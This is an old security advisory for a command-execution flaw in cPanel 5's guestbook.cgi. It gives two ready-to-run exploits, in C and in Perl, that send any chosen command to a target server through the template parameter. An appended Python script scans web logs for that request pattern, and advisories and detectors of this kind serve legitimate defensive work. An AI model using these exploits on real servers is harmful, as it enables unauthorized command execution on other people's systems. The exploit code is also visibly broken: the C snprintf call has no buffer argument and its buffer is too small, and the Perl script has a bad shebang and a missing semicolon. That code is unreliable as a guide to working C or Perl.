cPanel guestbook.cgi Remote Command Execution Vulnerability

Published: 2003-03-09
Updated: 2003-03-09
Severity: High
Threat level: ordinary user access privileges
Error type: input validation error
Exploitation mode: server mode
BUGTRAQ ID: 6882

Affected systems

cPanel cPanel 5.0

Detailed description

The guestbook.cgi script in the cPanel CGI software has an input validation vulnerability: the script does not adequately filter externally submitted data, so a remote attacker may exploit this vulnerability to execute arbitrary commands with the privileges of the web server process. cPanel version 5 is affected, and earlier versions are very likely affected as well.

Test code

/*
 * DSR-cpanel.c by bob@dtors.net
 * Vulnerbility found by Polkeyzz
 *
 * This is a Proof of Concept exploit for
 * the cpanel 5 and below. Problem is a open()
 * in guestbook.cgi.
 *
 * User may view any file or execute commands.
 * There also exists a local vulnerbility to
 * escalate privileges to root.
 *
 * PoC by bob of dtors.net >>DSR-apache rewrite<<
 */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[]) {
    int sock;
    char exp[75];
    struct in_addr addr;
    struct sockaddr_in sin;
    struct hostent *bob;

    fprintf(stdout, "\n\tDSR-cpanel.c By bob.\n");
    fprintf(stdout, "Proof Of Concept Code for cpanel 5.0 <\n");
    fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

    if(argc<3)
    {
        fprintf(stderr, "\nUsage : %s <host> <command>\n\n", argv[0]);
        exit(1);
    }

    if ((bob=gethostbyname(argv[1])) == NULL)
    {
        fprintf(stderr, "Socket Error!\n\n");
        exit(1);
    }

    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(bob->h_addr, (char *)&sin.sin_addr, bob->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);

    fprintf(stdout, "Connecting...\n");
    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
        fprintf(stderr, "...Problem Connecting, Exited.\n");
        exit(1);
    }
    else {
        snprintf(sizeof(exp)-1, "GET /cgi-sys/guestbook.cgi/user=cpanel&template=%s HTTP/1.1\r\nHost: %s\r\n\r\n"
            ,argv[2], argv[1]);
        write(sock,exp,strlen(exp));
        fprintf(stdout, "Command sent/executed!\n\n");
        close(sock);
        exit (0);
    }
}

#!usr/bin/perl
use LWP::UserAgent
print "##########################################\n";
print "# #\n";
print "# Remote Exploit for Cpanel 5 #\n";
print "# #\n";
print "##########################################\n";
print " C0d3r: CaMaLeoN\n";
die "Use: $0 <host> <command>\n" unless ($ARGV[1]);
$web=$ARGV[0];
$comando=$ARGV[1];
$fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando";
$url="http://$web/$fallos";
$ua = LWP::UserAgent->new();
$request = HTTP::Request->new('HEAD', $url);
$response = $ua->request($request);
if ($response->code == 200){
    print "Command sent.\n";
}
else
{
    print "The command could not be sent.\n";
}

Solution

The vendor has fixed this vulnerability in version 6.0 of the software:
http://www.cpanel.net/realindex.html?from=

Related information

pokleyzz <pokleyzz@scan-associates.net>
Cpanel 5 and below remote command execution and local root vulnerabilities
http://archives.neohapsis.com/archives/bugtraq/2003-02/0219.html
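
A defensive check for the request pattern both proof-of-concept programs above rely on, as an added example that is not part of the original advisory: it scans web server access log lines for requests to /cgi-sys/guestbook.cgi whose template parameter is not a plain name. The template-name allowlist, the Common Log Format layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate template is a plain name such as "default" or "book.html".
SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*")
# Request field of a Common Log Format entry; the target may contain raw spaces.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: HTTP/[\d.]+)?"')
# One PoC puts '?' before the parameters, the other '/'; accept both.
GUESTBOOK = re.compile(r"^/cgi-sys/guestbook\.cgi[/?](?P<params>.*)$")

# Constructed sample log lines (documentation addresses, placeholder payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2003:10:00:00 +0000] "GET /cgi-sys/guestbook.cgi?user=cpanel&template=default HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/Mar/2003:10:00:05 +0000] "HEAD /cgi-sys/guestbook.cgi?user=cpanel&template=%3Ccommand%3E HTTP/1.1" 200 0',
    '198.51.100.7 - - [09/Mar/2003:10:00:09 +0000] "GET /cgi-sys/guestbook.cgi/user=cpanel&template=<raw command> HTTP/1.1" 200 0',
    '192.0.2.44 - - [09/Mar/2003:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

def template_values(target):
    """Return the decoded value of every template= parameter in a request target."""
    match = GUESTBOOK.match(target)
    if not match:
        return []
    values = []
    for pair in match.group("params").split("&"):
        name, _, value = pair.partition("=")
        if name == "template":
            values.append(unquote(value.replace("+", " ")))
    return values

def suspicious_requests(log_lines):
    """Return (client, method, template) for each template value off the allowlist."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        for value in template_values(match.group("target")):
            if not SAFE_TEMPLATE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], match.group("method"), value))
    return hits

if __name__ == "__main__":
    for client, method, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} {method} guestbook.cgi template={value!r}")
```

The same allowlist, applied inside the CGI before the template value reaches any file-opening call, is the input validation the advisory says was missing.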